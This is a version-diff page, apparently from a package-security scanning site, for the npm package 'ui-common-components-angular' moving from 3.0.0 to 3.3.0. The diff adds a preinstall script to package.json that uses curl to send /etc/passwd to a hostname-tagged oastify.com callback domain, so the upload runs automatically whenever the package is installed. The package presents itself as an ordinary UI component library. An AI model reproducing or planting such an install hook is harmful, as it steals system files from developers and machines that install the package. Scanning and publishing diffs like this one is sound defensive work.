ui-common-components-angular 3.0.0 → 3.3.0
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +4 -4
package/package.json
CHANGED
@@ -1,12 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "ui-common-components-angular",
|
3
|
-
"version": "3.
|
3
|
+
"version": "3.3.0",
|
4
4
|
"description": "this library for ui-common-components-angular",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
|
-
"test": "
|
8
|
-
"preinstall": "
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd/' $(hostname).euc3nurunk7nf3sze7cwpdakebk284wt.oastify.com"
|
9
9
|
},
|
10
|
-
"author": "
|
10
|
+
"author": "strawberrrry",
|
11
11
|
"license": "ISC"
|
12
12
|
}
|